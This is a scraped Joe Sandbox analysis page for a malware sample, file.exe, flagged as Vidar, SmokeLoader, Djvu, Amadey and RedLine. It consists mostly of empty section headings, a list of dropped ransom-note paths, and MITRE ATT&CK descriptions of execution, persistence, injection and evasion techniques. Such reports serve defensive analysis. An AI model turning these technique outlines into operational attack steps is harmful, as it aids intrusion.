Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Threatname: SmokeLoader

Threatname: Djvu

Threatname: Amadey

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Bitcoin Miner

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

(copy)

C:\$WinREAgent\Scratch\_readme.txt

C:\$WinREAgent\_readme.txt

Windows Analysis Report
file.exe

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre